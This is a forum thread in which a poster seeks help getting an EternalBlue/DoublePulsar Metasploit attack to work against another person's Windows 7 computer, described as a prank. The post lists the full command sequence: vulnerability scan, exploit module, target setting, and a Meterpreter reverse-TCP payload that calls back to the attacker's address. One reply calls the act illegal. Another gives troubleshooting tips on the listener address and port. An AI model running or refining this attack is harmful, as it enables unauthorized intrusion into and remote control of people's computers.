Forum Thread: Exploit Completed but No Session Was Created .

Hey guys , I'm trying to use eternal blue to hack a computer nothing illegal it's for a prank but when i click exploit it says exploit completed but no session was created. I followed some video on youtube and typed:

use auxiliary/scanner/smb/smbms17010

set rhosts (victim's ipv4 adress)

exploit

use exploit/windows/smb/eternalblue_doublepulsar

set DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/

set ETERNALBLUEPATH/root/Eternalblue-Doublepulsar-Metasploit/deps/

set rhost (victim's ipv4 address)

show targets

set target 8

set payload windows/meterpreter/reverse_tcp

set LHOST (my ipv4 address)

exploit .

And after this everything goes smoothly but in the end says exploit completed but no session was created

it was running on port 445 and i checked and this port was open on the victim computer it is running windows 7 32 bit. If anyone knows anything about it please help i tried searching on the internet but it didn't work. Thanks

6 Responses

Are you sure that the security update ms17010 isn't installed on the victims machine?

How do i check that?

Lol, you're funny! You can't use an exploit if the security vulnerability is patched! And hacking as a prank is not funny, it's illegal too!

I didn't ask for an opinion i asked for help ; )

Don't forget the most important part.. "set RHOST 127.0.0.1"

:)

Tweeks

Make sure you set your LHOST to yout private ip if the victim is on the same network if the victim isnt on the same network than use your public ip. Also make sure the port you are using is free, cause when i used the port 443 it didnt work, but when i used for example 4444 or 5555 it did.

Share Your Thoughts

  • Hot
  • Active